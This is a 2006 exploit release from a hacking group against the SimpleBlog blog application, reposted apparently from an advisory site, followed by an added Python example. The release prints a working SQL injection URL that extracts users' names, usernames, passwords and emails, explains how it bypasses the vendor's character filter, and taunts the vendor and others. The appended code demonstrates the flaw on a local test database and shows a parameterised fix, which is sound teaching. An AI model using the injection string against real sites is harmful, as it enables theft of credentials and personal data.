2006-09-04 SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability
Rated as : High Risk

                                           _           _        
                                    __   _(_)_ __  ___| |_ __ _ 
                                    \ \ / / | '_ \/ __| __/ _` |
                                     \ V /| | |_) \__ \ || (_| |
                                      \_/ |_| .__/|___/\__\__,_|
                                          |_| AnD
		                               _               _    _ _ _     
                       _ __ ___  _   _ _ __ __| | ___ _ __ ___| | _(_) | |____
                      | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_  /
                      | | | | | | |_| | | | (_| |  __/ |  \__ \   <| | | |/ /
                      |_| |_| |_|\__,_|_|  \__,_|\___|_|  |___/_|\_\_|_|_/___|

 		+-----------------------------------------------------------------+
		| Vipsta & MurderSkillz fucking pwnt this webApp                  |
		+-----------------------------------------------------------------+
		| App Name: SimpleBlog 2.3 					  |
		| App Author: 8pixel.net					  |
		| App Version: <= 2.3 						  |
		| App Type: Blog/Journal					  |
		+-----------------------------------------------------------------+
		| DETAILS							  |
		+-----------------------------------------------------------------+
		| Vulnerability: Remote SQL Injection				  |
		| Requirements: Database with UNION support			  |
		| Revisions: Note - This is a revision of another vuln 	          |
		|	            posted by Chironex Fleckeri			  |
		+-----------------------------------------------------------------+
		| CODE								  |
		+-----------------------------------------------------------------+
		| Vendor "implemented" a fix for SQL injection vulnerabilities.   |
		| However, this bullshit was easily worked around by		  |
		| Vipsta & MurderSkillz.					  |
		|								  |
		| Vendor attempted to remove illegal characters like ' and =      |
		| which stop most SQL injection vulnerabilities. However:	  |
		| Vendor failed to remove '>' symbol.				  |
		+-----------------------------------------------------------------+
		| EXPLOIT							  |
		+-----------------------------------------------------------------+
		| SQL Injection String:						  |

+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
 		| TIMELINE							  |
		+-----------------------------------------------------------------+
		| 9/2/06 - Vendor Notified.					  |
		| 9/2/06 - Vendor Replied. Threatens legal action.		  |
		| 9/4/06 - Exploit Released with no details to vendor.            |
		+-----------------------------------------------------------------+
		| SHOUTZ							  |
		+-----------------------------------------------------------------+
		| Everyone at g00ns.net - including:				  |
		| 	z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo,	  |
		|	TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot,	  |
		|	JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be,  |
		|	ReysRaged, milf <3, gio, RedCoat, and all who I forgot!   |
		+-----------------------------------------------------------------+
		| ADDITIONAL NOTES						  |
		+-----------------------------------------------------------------+
		| TeamSpeak: ts.g00ns.net					  |
		| IRC: irc.g00ns.net						  |
		+-----------------------------------------------------------------+
		| PERSONAL STUFF						  |
		+-----------------------------------------------------------------+
		| Sess from g00ns.net IS A FUCKING MORON.                         |
		+-----------------------------------------------------------------+

                                             __ 
                                  ___  ___  / _|
                                 / _ \/ _ \| |_ 
                                |  __/ (_) |  _|
                                 \___|\___/|_|.
securitydot.net - 2006-09-04
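
Added example, not part of the original advisory and not SimpleBlog's code: a Python/sqlite3 stand-in for the flaw described under CODE, showing why stripping ' and = does not protect an unquoted numeric id, next to an allow-list check with a bound parameter. T_POSTS, its columns, the sample rows and all function names are hypothetical; T_USERS and uUSERNAME are taken from the advisory.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in database; T_POSTS and the sample rows are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE T_POSTS (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE T_USERS (id INTEGER PRIMARY KEY, uUSERNAME TEXT);
        INSERT INTO T_POSTS VALUES (1, 'hello world');
        INSERT INTO T_USERS VALUES (1, 'admin'), (2, 'editor');
    """)
    return db


def blacklist_filter(value):
    """The kind of fix the advisory describes: delete ' and = from the input."""
    return value.replace("'", "").replace("=", "")


def view_post_blacklist(db, raw_id):
    # Numeric context: the value is never inside quotes, so removing quote
    # characters does nothing to stop it from being parsed as SQL syntax.
    sql = "SELECT id, title FROM T_POSTS WHERE id = " + blacklist_filter(raw_id)
    return db.execute(sql).fetchall()


def view_post_hardened(db, raw_id):
    # Allow-list instead of blacklist: accept only a short run of ASCII digits,
    # then pass the value as a bound parameter so it can only ever be data.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title FROM T_POSTS WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


# Constructed input shaped like the advisory's string: no quote, no equals sign.
CRAFTED = "-1 UNION SELECT id, uUSERNAME FROM T_USERS WHERE id>1"

if __name__ == "__main__":
    db = make_db()
    print("blacklist:", view_post_blacklist(db, CRAFTED))  # user row leaks
    print("hardened :", view_post_hardened(db, "1"))       # normal lookup
    try:
        view_post_hardened(db, CRAFTED)
    except ValueError as exc:
        print("hardened rejects crafted id:", exc)
```
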
